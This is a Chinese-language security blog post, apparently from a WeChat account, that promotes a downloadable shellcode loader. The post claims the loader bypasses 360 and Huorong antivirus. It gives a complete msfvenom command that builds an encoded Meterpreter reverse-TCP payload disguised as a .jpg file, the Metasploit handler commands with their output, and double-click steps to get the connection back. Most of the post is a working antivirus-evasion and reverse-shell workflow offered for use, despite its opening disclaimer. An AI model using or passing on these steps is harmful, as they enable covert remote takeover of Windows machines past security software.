本文的所有技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
工具放出来很快就会失效!!!仅供参考!
更多详情请关注公众号:乌鸦安全
该shellcode
加载器目前可以过360&火绒
,Windows Defender
没戏。。。
代码和思路暂不开源!
你可以在我的GitHub上下载该工具:
如果你访问GitHub困难,你可以在乌鸦安全公众号
后台直接回复关键字:加载器 下载!
方法: 生成msf
或cs
的shellcode
原生格式,命名为crowsec.jpg
(这个是写死的),将其和crowsec_shelllcodeBypass.exe
(这个名字可以修改的)放在一个目录下,直接双击即可!
杀软\免杀效果 | 虚拟机环境:Windows 10 | 虚拟机环境:Windows 7 | 虚拟机环境:Windows server 2019 | 最新测试时间 |
---|---|---|---|---|
联网Windows Defender最新版(关闭自动发送可疑样本) | ❌ | 未测 | ❌ | 2022.01.19 |
联网360最新版(其实测试没有什么意义) | ✅ | ✅ | ✅ | 2022.01.19 |
联网火绒最新版 | 未测 | ✅ | ✅ | 2022.01.19 |
这个数据已没有意义。
这个shellcode
加载器工具是我在2021-06-21
号做的,优化之后VT查杀为0/68
,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68
。
2021-06-21
是能过火绒
、360
、Windows Defender(关闭自动发送可疑样本)
前几天在测试的时候,发现过不了Windows Defender
,今天稍微优化了一下,发现还是过不了Windows Defender
,主要原因是识别了msf
的部分特征!!!
鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(🐶),至少还能过360
和火绒
。(放出来之后,基本上几小时就没用了)。
查询时间:2022.01.19
在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai
编码器器对shellcode
进行混淆编码,编码之后的shellcode
并不是所有杀软都识别不出来,详情可以看我以前的文章:
xxxx
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00' lhost=10.211.55.2 lport=1234 -f raw -o crowsec.jpg
使用msf进行监听:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:1234
在这里只说思路,能够过火绒
和360
,但是不能过Windows Defender
,同样的问题:特征出现在shellcode
上面。
将文件保存为crowsec.jpg
(下图是一个示例,主要是太累了,不想换了。。。)
现将生成的bin文件修改为png文件,然后双击上线操作